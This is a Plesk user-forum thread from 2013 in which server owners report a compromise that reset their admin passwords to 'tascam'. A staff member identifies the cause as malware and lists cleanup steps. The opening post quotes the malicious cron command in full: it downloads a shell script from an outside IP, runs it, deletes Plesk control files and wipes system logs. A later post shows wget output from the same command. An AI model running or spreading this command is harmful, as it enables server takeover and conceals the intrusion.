1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice
  2. Dear Pleskians, please read this carefully! New attachments and other rules Thank you!
    Dismiss Notice
  3. Dear Pleskians, I really hope that you will share your opinion in this Special topic for chatter about Plesk in the Clouds. Thank you!
    Dismiss Notice

Some psa cronjob failed, and everything is screwed up

Discussion in 'Plesk 9.x for Linux Suggestions and Feedback' started by matteosistisette, Jan 15, 2013.

  1. matteosistisette

    matteosistisette New Pleskian

    10
    60%
    Joined:
    Sep 19, 2012
    Messages:
    9
    Likes Received:
    0
    I got this email with the output of of some cronjob executing some of Plesk's broken scripts, and it's full of errors:

    Cron <root@ks3094309> cd /tmp;wget http://128.173.237.127:8080/browser/browser/backup1.sh;chmod x backup1.sh;sh /tmp/backup1.sh;rm -Rf /tmp/backup1.sh;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/control.php;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/eng.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/control.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/logs/httpsd_access_log;rm -Rf /var/log/cron;rm -Rf /var/log/secure;rm -Rf /var/log/lastlog;rm -Rf /var/log/auth.log;cd /usr/local/psa/admin/htdocs/enterprise/control/;mv agent.php agenti.php;mv old.php agenti.php;mv Agent.php agenti.php

    Starting from then, I cannot login anymore into Plesk. It says incorrect login or password, but i definitely have NOT forgotten my password.

    I would open a support ticket but since I cannot even log into Plesk I cannot retrieve my license number which I OBVIOUSLY don't remember.

    Some broken script of Plesk seems to have f***ed up everything.
    Please somebody from Parallels help.
     
    Last edited: Jan 15, 2013
  2. matteosistisette

    matteosistisette New Pleskian

    10
    60%
    Joined:
    Sep 19, 2012
    Messages:
    9
    Likes Received:
    0
    Turns out the password had been reset to "tascam" (a value I certainly never set).
    (I found out by looking at /etc/psa/.psa.shadow

    So I logged in, changed the password, and tried to submit a support ticket.

    But I'm told you have exceeded the support period and have to pay to get support. On a bug in the software of which you are already paying a license. Makes perfect sense.
     
  3. IgorG

    IgorG Forums Analyst Staff Member

    49
    24%
    Joined:
    Oct 27, 2009
    Messages:
    24,557
    Likes Received:
    1,242
    Location:
    Novosibirsk, Russia
    We have answered on your question to bugreport@
    Please check it.
     
  4. altcomLimited

    altcomLimited New Pleskian

    10
     
    Joined:
    Jan 21, 2013
    Messages:
    1
    Likes Received:
    0
    Same problem with our server

    Hello,

    Could you explain exactly what has happened here as one of our servers has had exactly the same problem (Plesk 9.0.1). The password had also been reset to 'tascam'. Has the server been hacked? We couldn't find anything suspicious but we obviously want to know how it has happened. That two server both had there passsords changed to the same value around the same time seems incredibly unlikely except by design.

    Cheers, Neil
     
  5. ThomasPa

    ThomasPa New Pleskian

    10
     
    Joined:
    Jan 22, 2013
    Messages:
    1
    Likes Received:
    0
    Same Problem

    Got the same problem on our server. It seems to be hacked, password has been also changed to "tascam". I changed my root password and can access the server as usual. Sicne the pass has been changed, I get the following message from the root server every minute:

    --2013-01-22 10:15:01-- http://128.173.237.127:8080/browser/browser/backup.sh
    Connecting to 128.173.237.127:8080... connected.
    HTTP request sent, awaiting response... 404 /browser/browser/backup.sh
    2013-01-22 10:15:02 ERROR 404: /browser/browser/backup.sh.

    chmod: invalid mode: `x'
    Try `chmod --help' for more information.
    sh: /tmp/backup.sh.sh: No such file or directory
    chattr: No such file or directory while trying to stat /usr/local/psa/admin/htdocs/enterprise/control/control.php

    chattr: No such file or directory while trying to stat /usr/local/psa/admin/htdocs/enterprise/control/index.jsp

    mv: cannot stat `agent.php': No such file or directory
    mv: cannot stat `old.php': No such file or directory
    mv: cannot stat `Agent.php': No such file or directory

    We are currently evaluating the whole thing. Does anybody know, how the hack has been performed and what the script did on our server? Any hints what we shall be aware of?
     
  6. IgorG

    IgorG Forums Analyst Staff Member

    49
    24%
    Joined:
    Oct 27, 2009
    Messages:
    24,557
    Likes Received:
    1,242
    Location:
    Novosibirsk, Russia
    There was following reply to matteosistisette:

    The script you've provided is not a Plesk's cronjob.
    Instead it looks like a kind of malware.
    I suggest you to check that all Plesk's microupdates are installed on the server (should be 9.5.4 MU#27): http://kb.parallels.com/9294 Keep your OS up2date Check the server with antivirus/rootkit hunter software Analyze cronjobs and remove all suspicious.
    Change passwords.
     
  7. Steve242

    Steve242 New Pleskian

    10
     
    Joined:
    Jan 23, 2013
    Messages:
    1
    Likes Received:
    0
    Same problem with password reset

    We've noticed the same problem with the admin password being reset to 'tascam' (not by us). This seems to coincide with an auto update of Plesk to 9.0.1. Anyone got any more details on why that's happening?
     
  8. IgorG

    IgorG Forums Analyst Staff Member

    49
    24%
    Joined:
    Oct 27, 2009
    Messages:
    24,557
    Likes Received:
    1,242
    Location:
    Novosibirsk, Russia
  9. tillathenun

    tillathenun New Pleskian

    10
     
    Joined:
    Feb 7, 2013
    Messages:
    1
    Likes Received:
    0
    Same here

    I had the password changed to tascam as well. The user had also been changed to 'test'.

    To be honest, I found Parallel's page on how to fix it pretty complicated and not at all simple if you're an SSH newbie like me - the link below helped massively when trying to get Plesk back online so I could at least start changing passwords etc.

    http://wpguru.co.uk/2010/07/when-plesk-fails-to-upgrade/
     
Loading...